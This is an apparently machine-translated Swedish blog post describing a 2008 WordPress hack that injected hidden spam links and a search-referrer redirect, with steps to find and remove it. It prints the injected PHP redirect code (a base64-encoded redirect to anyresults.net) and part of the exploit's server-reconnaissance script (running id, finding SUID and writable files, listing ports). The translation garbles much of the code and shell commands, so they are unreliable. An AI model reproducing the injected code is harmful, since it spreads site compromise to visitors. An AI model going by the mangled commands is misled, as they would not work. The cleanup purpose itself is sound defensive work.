Bloggosfären virus ... men jag har haft det?!

Under den senaste månaden har jag fått varningar virus i blogg från några besökare. Initialt jag ignorerade varningarna, eftersom jag installerade en ganska bra antivirus (Kaspersky AV 2009) Och ännu mer tid med att sitta på bloggen, jag fick aldrig virusvarning (tidigare .. Jag såg något misstänkt att den första uppdateringsförsvann. Hur som helst ...).
Sakta började dyka stora variationer besökare trafikEfter vilken trafik nyligen har sjunkit stadigt och började bli mer och mer folk som säger åt mig att stealthsettings.com det är virused. I går fick jag från någon skärmdump gjort när antivirusblockerade en skript den stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var ganska övertygande för mig, att jag satte på sökt alla källor. Den första tanken som kom till mig var att göra uppgradera den senaste Wordpress (2.5.1), men inte alla filer innan du tar bort den gamla manus och göra Wordpress backup databas. Detta förfarande har tappat målet, och förmodligen skulle ha tagit lång tid att räkna sema där är där skon klämmer, om jag skulle ha sagt en kaffe prata, fann han Google och det skulle vara bra att se honom.
MyDigitalLife.info, publicerade en artikel med rubriken: "Wordpress Hack: Återställ och Fix Google och sökmotor eller Nej Cookie Trafiken omdirigeras till din-Needs.info, AnyResults.Net, Golden-Info.net och andra olagliga platser"Det är slutet på tråden jag behövde.
Det handlar om en exploatera Word baserat på kaka, Vilket jag tycker är mycket komplex och gjorde boken. Smart nog att göra en SQL Injection databas blogg, för att skapa ett osynligt användaren en enkel rutinkontroll Dashboard->användare, Kontrollera server kataloger och filer "skrivbara" (Vilket chmod 777), för att söka och exekvera filer med samma behörighet som root-användare eller grupp. Jag vet inte vem som utnyttjar namn och se till att det finns få artiklar skrivna om honom, trots att många bloggar är smittade, inklusive Rumänien. Ok ... Jag ska försöka att försöka förklara generaliseringar om viruset.

Vad är virus?

Först sätter källorna till sidor på bloggar, länkar osynlig för besökare men synlig och vänd för sökmotorer, särskilt Google. På det här sättet överföring Page Rank platser som anges av angripare. För det andra, är införd omdirigeringskod URL för besökare som kommer från Google, Live, Yahoo, ... eller en RSS-läsare och inte platsen kaka. EN antivirus känner av redirect som Trojan-Clicker.HTML.

Symptom:

Massiv nedgång i besökstrafik, Speciellt på bloggar där de flesta besökarna kommer från Google.

Identifiering: (Därför blev problemet för dem utan en aning om hur phpmyadmin php och Linux)

LA. VARNING! Först göra en backup databas!

1. Kontrollera källfilerna index.php, header.php, footer.php, Bloggen tema och se om det finns en kod som använder kryptering base64 eller innehåller "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "formen:

<? Php
$ Seref = array ("google", "msn", "live", "altavista"
"Ja", "yahoo", "AOL", "CNN", "väder", "Alexa");
$ Ser = 0; foreach ($ Seref som $ ref)
if (strpos (strtolower
! ($ _SERVER ['HTTP_REFERER']), $ ref) == False) {$ ser = "1?; sönder; }
if ($ ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (". http:// YW55cmVzdWx0cy5uZXQ = ') "/"); exit;
}>

... Eller något. Ta bort denna kod!

Klicka på bilden ...

indexkod

I skärmdumpen ovan jag av misstag valt "<Php get_header (); > ". Den koden bör förbli.

2. Använd phpMyAdmin och gå till databastabellen wp_usersOm att kontrollera om det finns något användarnamn skapas på 00:00:00 0000-00-00 (Möjligt i fält user_login säger "Wordpress". Skriv här användar-ID (fält-ID) sedan torka det.

Klicka på bilden ...

Falsk användaren

* Den gröna linjen ska tas bort och behöll hans ID. I fallet med Var ID = 8 .

3. Gå till tabell wp_usermeta, Var till belägen och torka linjer motsvarande ID (där fältet USER_ID ID-värde visas raderas).

4. Bord wp_option, Att gå active_plugins och se vilka plugin är aktiverad misstänkt. Den kan användas som ändelser _old.giff, _old.pngg, _old.jpeg, _new.php.giffEtc extensions kombinationer att _old och _new falska bild.

Wp_options SELECT * FROM WHERE option_name = 'active_plugins "

Ta bort denna plugin, gå sedan till bloggen -> Dashboard -> Plugins, som inaktiverar och aktiverar en viss plugin.

Klicka på bilden för att se hur filen visas active_plugins virus.

plugin

Följ stigen FTP eller SSH, och ta bort filen som anges i active_plugins server.

5. Också i phpMyAdmin, i tabell wp_option, Hitta och ta bort raden med "rss_f541b3abd05e7962fcab37737f40fad8"Och bland"internal_links_cache ".
I internal_links_cache är tillgängliga krypterad spam länkar som visas i bloggen och en Google Adsense-kod, Av hackaren.

6. Rekommenderat är att ändra lösenord Blogg och inloggning avlägsna all misstänkt userele. Uppgradera till den senaste versionen av Wordpress och ställa in bloggen för att inte tillåta registrering av nya användare. Det finns ingen förlust ... kan kommentera och ologiskt.

Jag försökte förklara över något, vad de ska göra i en sådan situation, för att rengöra detta virus blogg. Problemet är mer allvarligt än det verkar och knappast lösas, för användning säkerhetsproblem värd för webbserver, vilket är blogg.

Som ett första mått på säkerhet, med tillgång SSH, Gör några kontroller på servern för att se om det finns filer som * _old * och * _new. * Med ändelser.GIFF. jpeg. pngg. jpgg. Dessa filer bör strykas. Om du byter namn på en fil, till exempel. top_right_old.giff in top_right_old.phpVi ser att filen är exakt utnyttja koden servern.

Några användbara indikationer på kontroll, rengöring och säkerhetsserver. (Via SSH)

1. cd / tmp och kontrollera om det finns mappar som tmpVFlma eller andra kombinationer-liknande namn och ta bort den. Se skärmdumpen nedan, två sådana mappar till mig:

tmpserver

rm-rf mapp

2. Kontrollera elimiati (chmod förändring) som möjliga mappar attribut chmod 777

hitta alla skrivbara filer i aktuell katalog: Sök. -Type f-perm-2-ls
hitta alla skrivbara kataloger i nuvarande dir: Sök. -Type d-perm-2-ls
hitta alla skrivbara kataloger och filer i aktuell katalog: Sök. -Perm-2-ls

3. Letar du efter misstänkta filer på servern.

Sök. -Namn "* _new.php *"
Sök. -Namn "* _old.php *"
Sök. -Namn "*. Jpgg"
Sök. -Namn "* _giff"
Sök. -Namn "* _pngg"

4, VARNING! filerna som sattes bit SUID si SGID. Dessa filer köra med samma behörighet som användaren (grupp) eller rot, inte användaren köra filen. Dessa filer kan leda till root kompromiss om det finns säkerhetsproblem. Om du använder filer med SUID och SGID bitar, utföra 'chmod 0 " på eller avinstallera paketet som innehåller dem.

Den utnyttjar innehåller någonstans i källan ...:

if (! $ safe_mode) {
if ($ os_type == "nix") {
. $ Os = Utför ('sysctl-n kern.ostype');
. $ Os = Utför ('sysctl-n kern.osrelease');
. $ Os = Utför ('sysctl-n kernel.ostype');
. $ Os = Utför ('sysctl-n kernel.osrelease');
if (tom ($ user)) $ user = execute ('id');
$ Alias ​​= array (
"=>"
"Hitta suid filer '=>' find /-type f-perm-04000-ls",
"Hitta SGID filer '=>' find /-type f-perm-02000-ls",
"Hitta alla skrivbara filer i aktuell dir '=>' hitta. -Type f-perm-2-ls ",
"Hitta alla skrivbara kataloger i nuvarande dir '=>' hitta. -Type d-perm-2-ls ",
"Hitta alla skrivbara kataloger och filer i aktuell dir '=>' hitta. -Perm-2-ls ",
"Show öppnade portarna '=>' netstat-en | grep-Jag lyssnar",
);
} Else {
. $ Os_name = Utför ('ver');
$ User = Utför ('echo% username%').;
$ Alias ​​= array (
"=>"
"Visa Runing tjänster '=>' net start"
"Visa process lista '=>' tasklist"
);
}

På detta sätt ... i grund och botten finner brott i säkerhet. Portar öppna kataloger "skrivbara" och utförande grupp privilegier filer / rot.

Tillbaka med mera ...

Vissa bloggar infekterade: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Listan kan göras lång ... mycket.

Du kan kontrollera om en blogg är virus, med hjälp av Googles sökmotor. kopiera och klistra in:

site: www.blegoo.com köpa

God natt och ökad arbets ;) Snart jag kommer till Eugene nyheter om prevezibil.imprevizibil.com.

brb :)

LA: VARNING! Ändra Wordpress tema eller uppgradera till Wordpress 2.5.1, inte en lösning för att bli av med detta virus.

Bloggosfären virus ... men jag har haft det?!

Om författaren

Stealth

Brinner för allt som gadget och IT skriver gärna stealthsettings.com av 2006 och jag gillar att upptäcka nya saker med dig om datorer och MacOS, Linux, Windows, iOS och Android.

Lämna en kommentar

Den här sidan använder Akismet för att minska spam. Läs om hur din kommentardata behandlas.